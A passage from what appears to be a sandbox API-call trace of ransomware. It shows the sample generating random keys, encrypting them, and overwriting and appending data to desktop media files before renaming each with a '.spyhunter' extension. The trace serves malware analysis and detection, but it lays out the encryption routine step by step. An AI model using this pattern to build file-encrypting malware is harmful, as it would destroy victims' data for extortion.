lpMem=0x2f2d3f8 | out: hHeap=0x2c0000) returned 1 [0149.159] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ef20 | out: pbBuffer=0x248ef20) returned 1 [0149.160] GetProcessHeap () returned 0x2c0000 [0149.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0149.160] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ef18*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ef18*=0x30) returned 1 [0149.160] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uPjxyWbPMS_.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\upjxywbpms_.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0149.160] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uPjxyWbPMS_.swf") returned 57 [0149.160] StrStrW (lpFirst="uPjxyWbPMS_.swf", lpSrch=".txt") returned 0x0 [0149.160] GetProcessHeap () returned 0x2c0000 [0149.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0149.160] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eedc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248eedc*=0x2800, lpOverlapped=0x0) returned 1 [0149.161] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.161] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248eedc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248eedc*=0x2800, lpOverlapped=0x0) returned 1 [0149.161] GetProcessHeap () returned 0x2c0000 [0149.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0149.162] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.162] WriteFile (in: hFile=0x9c, lpBuffer=0x248ef1c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eedc, lpOverlapped=0x0 | out: lpBuffer=0x248ef1c*, lpNumberOfBytesWritten=0x248eedc*=0x4, lpOverlapped=0x0) returned 1 [0149.162] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eedc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248eedc*=0x30, lpOverlapped=0x0) returned 1 [0149.162] CloseHandle (hObject=0x9c) returned 1 [0149.162] GetProcessHeap () returned 0x2c0000 [0149.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0149.162] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uPjxyWbPMS_.swf.spyhunter") returned 67 [0149.162] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uPjxyWbPMS_.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\upjxywbpms_.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uPjxyWbPMS_.swf.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\upjxywbpms_.swf.spyhunter")) returned 1 [0149.164] GetProcessHeap () returned 0x2c0000 [0149.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0149.164] GetProcessHeap () returned 0x2c0000 [0149.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0149.164] GetProcessHeap () returned 0x2c0000 [0149.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2d338 | out: hHeap=0x2c0000) returned 1 [0149.164] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ef18 | out: pbBuffer=0x248ef18) returned 1 [0149.164] GetProcessHeap () returned 0x2c0000 [0149.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0149.164] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ef10*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ef10*=0x30) returned 1 [0149.164] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uFj3ylea7WqIunpHtOB.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ufj3ylea7wqiunphtob.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0149.164] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uFj3ylea7WqIunpHtOB.m4a") returned 65 [0149.164] StrStrW (lpFirst="uFj3ylea7WqIunpHtOB.m4a", lpSrch=".txt") returned 0x0 [0149.165] GetProcessHeap () returned 0x2c0000 [0149.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0149.165] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eed4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248eed4*=0x2800, lpOverlapped=0x0) returned 1 [0149.165] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.166] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248eed4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248eed4*=0x2800, lpOverlapped=0x0) returned 1 [0149.166] GetProcessHeap () returned 0x2c0000 [0149.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0149.166] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.166] WriteFile (in: hFile=0x9c, lpBuffer=0x248ef14*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eed4, lpOverlapped=0x0 | out: lpBuffer=0x248ef14*, lpNumberOfBytesWritten=0x248eed4*=0x4, lpOverlapped=0x0) returned 1 [0149.166] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eed4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248eed4*=0x30, lpOverlapped=0x0) returned 1 [0149.166] CloseHandle (hObject=0x9c) returned 1 [0149.166] GetProcessHeap () returned 0x2c0000 [0149.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0149.167] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uFj3ylea7WqIunpHtOB.m4a.spyhunter") returned 75 [0149.167] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uFj3ylea7WqIunpHtOB.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ufj3ylea7wqiunphtob.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uFj3ylea7WqIunpHtOB.m4a.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ufj3ylea7wqiunphtob.m4a.spyhunter")) returned 1 [0149.168] GetProcessHeap () returned 0x2c0000 [0149.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0149.170] GetProcessHeap () returned 0x2c0000 [0149.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0149.170] GetProcessHeap () returned 0x2c0000 [0149.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e09248 | out: hHeap=0x2c0000) returned 1 [0149.171] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ef18 | out: pbBuffer=0x248ef18) returned 1 [0149.171] GetProcessHeap () returned 0x2c0000 [0149.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0149.171] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ef10*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ef10*=0x30) returned 1 [0149.171] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\t2hNTsMkRR.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\t2hntsmkrr.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0149.171] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\t2hNTsMkRR.jpg") returned 56 [0149.171] StrStrW (lpFirst="t2hNTsMkRR.jpg", lpSrch=".txt") returned 0x0 [0149.171] GetProcessHeap () returned 0x2c0000 [0149.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0149.172] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eed4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248eed4*=0xb3b, lpOverlapped=0x0) returned 1 [0149.172] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffff4c5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.172] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xb3b, lpNumberOfBytesWritten=0x248eed4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248eed4*=0xb3b, lpOverlapped=0x0) returned 1 [0149.172] GetProcessHeap () returned 0x2c0000 [0149.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0149.172] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.172] WriteFile (in: hFile=0x9c, lpBuffer=0x248ef14*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eed4, lpOverlapped=0x0 | out: lpBuffer=0x248ef14*, lpNumberOfBytesWritten=0x248eed4*=0x4, lpOverlapped=0x0) returned 1 [0149.172] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eed4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248eed4*=0x30, lpOverlapped=0x0) returned 1 [0149.172] CloseHandle (hObject=0x9c) returned 1 [0149.249] GetProcessHeap () returned 0x2c0000 [0149.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0149.249] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\t2hNTsMkRR.jpg.spyhunter") returned 66 [0149.250] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\t2hNTsMkRR.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\t2hntsmkrr.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\t2hNTsMkRR.jpg.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\t2hntsmkrr.jpg.spyhunter")) returned 1 [0149.251] GetProcessHeap () returned 0x2c0000 [0149.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0149.251] GetProcessHeap () returned 0x2c0000 [0149.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0149.251] GetProcessHeap () returned 0x2c0000 [0149.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2d278 | out: hHeap=0x2c0000) returned 1 [0149.251] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ef10 | out: pbBuffer=0x248ef10) returned 1 [0149.251] GetProcessHeap () returned 0x2c0000 [0149.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0149.251] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ef08*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ef08*=0x30) returned 1 [0149.252] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\rngdt\\OavuAOqC8U34NMJMAC45.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\koyovlsv970yodlr4y\\rngdt\\oavuaoqc8u34nmjmac45.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0149.252] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\rngdt\\OavuAOqC8U34NMJMAC45.mkv") returned 91 [0149.252] StrStrW (lpFirst="OavuAOqC8U34NMJMAC45.mkv", lpSrch=".txt") returned 0x0 [0149.252] GetProcessHeap () returned 0x2c0000 [0149.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0149.252] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eecc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248eecc*=0x2800, lpOverlapped=0x0) returned 1 [0149.253] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.253] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248eecc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248eecc*=0x2800, lpOverlapped=0x0) returned 1 [0149.253] GetProcessHeap () returned 0x2c0000 [0149.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0149.254] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.254] WriteFile (in: hFile=0x178, lpBuffer=0x248ef0c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eecc, lpOverlapped=0x0 | out: lpBuffer=0x248ef0c*, lpNumberOfBytesWritten=0x248eecc*=0x4, lpOverlapped=0x0) returned 1 [0149.254] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eecc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248eecc*=0x30, lpOverlapped=0x0) returned 1 [0149.254] CloseHandle (hObject=0x178) returned 1 [0149.729] GetProcessHeap () returned 0x2c0000 [0149.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0149.729] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\rngdt\\OavuAOqC8U34NMJMAC45.mkv.spyhunter") returned 101 [0149.729] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\rngdt\\OavuAOqC8U34NMJMAC45.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\koyovlsv970yodlr4y\\rngdt\\oavuaoqc8u34nmjmac45.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\rngdt\\OavuAOqC8U34NMJMAC45.mkv.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\koyovlsv970yodlr4y\\rngdt\\oavuaoqc8u34nmjmac45.mkv.spyhunter")) returned 1 [0149.730] GetProcessHeap () returned 0x2c0000 [0149.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0149.730] GetProcessHeap () returned 0x2c0000 [0149.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0149.730] GetProcessHeap () returned 0x2c0000 [0149.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f46628 | out: hHeap=0x2c0000) returned 1 [0149.730] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ef10 | out: pbBuffer=0x248ef10) returned 1 [0149.730] GetProcessHeap () returned 0x2c0000 [0149.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0149.730] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ef08*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ef08*=0x30) returned 1 [0149.730] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\GKryotyXcNy8Wwzx.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\koyovlsv970yodlr4y\\gkryotyxcny8wwzx.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0149.731] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\GKryotyXcNy8Wwzx.wav") returned 81 [0149.731] StrStrW (lpFirst="GKryotyXcNy8Wwzx.wav", lpSrch=".txt") returned 0x0 [0149.731] GetProcessHeap () returned 0x2c0000 [0149.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0149.731] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eecc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248eecc*=0x2800, lpOverlapped=0x0) returned 1 [0149.732] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.732] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248eecc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248eecc*=0x2800, lpOverlapped=0x0) returned 1 [0149.732] GetProcessHeap () returned 0x2c0000 [0149.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0149.732] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.732] WriteFile (in: hFile=0x178, lpBuffer=0x248ef0c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eecc, lpOverlapped=0x0 | out: lpBuffer=0x248ef0c*, lpNumberOfBytesWritten=0x248eecc*=0x4, lpOverlapped=0x0) returned 1 [0149.732] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eecc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248eecc*=0x30, lpOverlapped=0x0) returned 1 [0149.732] CloseHandle (hObject=0x178) returned 1 [0149.732] GetProcessHeap () returned 0x2c0000 [0149.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0149.732] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\GKryotyXcNy8Wwzx.wav.spyhunter") returned 91 [0149.732] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\GKryotyXcNy8Wwzx.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\koyovlsv970yodlr4y\\gkryotyxcny8wwzx.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\GKryotyXcNy8Wwzx.wav.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\koyovlsv970yodlr4y\\gkryotyxcny8wwzx.wav.spyhunter")) returned 1 [0149.759] GetProcessHeap () returned 0x2c0000 [0149.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0149.759] GetProcessHeap () returned 0x2c0000 [0149.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0149.759] GetProcessHeap () returned 0x2c0000 [0149.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f638b8 | out: hHeap=0x2c0000) returned 1 [0149.760] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ef08 | out: pbBuffer=0x248ef08) returned 1 [0149.760] GetProcessHeap () returned 0x2c0000 [0149.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0149.760] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ef00*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ef00*=0x30) returned 1 [0149.760] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\g5PImDCE.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\koyovlsv970yodlr4y\\g5pimdce.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0149.761] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\g5PImDCE.mp3") returned 73 [0149.761] StrStrW (lpFirst="g5PImDCE.mp3", lpSrch=".txt") returned 0x0 [0149.761] GetProcessHeap () returned 0x2c0000 [0149.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0149.761] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eec4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248eec4*=0x2800, lpOverlapped=0x0) returned 1 [0149.762] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.762] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248eec4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248eec4*=0x2800, lpOverlapped=0x0) returned 1 [0149.762] GetProcessHeap () returned 0x2c0000 [0149.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0149.762] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.762] WriteFile (in: hFile=0x178, lpBuffer=0x248ef04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eec4, lpOverlapped=0x0 | out: lpBuffer=0x248ef04*, lpNumberOfBytesWritten=0x248eec4*=0x4, lpOverlapped=0x0) returned 1 [0149.762] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eec4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248eec4*=0x30, lpOverlapped=0x0) returned 1 [0149.762] CloseHandle (hObject=0x178) returned 1 [0149.762] GetProcessHeap () returned 0x2c0000 [0149.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0149.762] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\g5PImDCE.mp3.spyhunter") returned 83 [0149.762] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\g5PImDCE.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\koyovlsv970yodlr4y\\g5pimdce.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\g5PImDCE.mp3.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\koyovlsv970yodlr4y\\g5pimdce.mp3.spyhunter")) returned 1 [0149.763] GetProcessHeap () returned 0x2c0000 [0149.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0149.763] GetProcessHeap () returned 0x2c0000 [0149.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0149.763] GetProcessHeap () returned 0x2c0000 [0149.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb52d8 | out: hHeap=0x2c0000) returned 1 [0149.763] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ef08 | out: pbBuffer=0x248ef08) returned 1 [0149.764] GetProcessHeap () returned 0x2c0000 [0149.764] RtlAllocateHeap 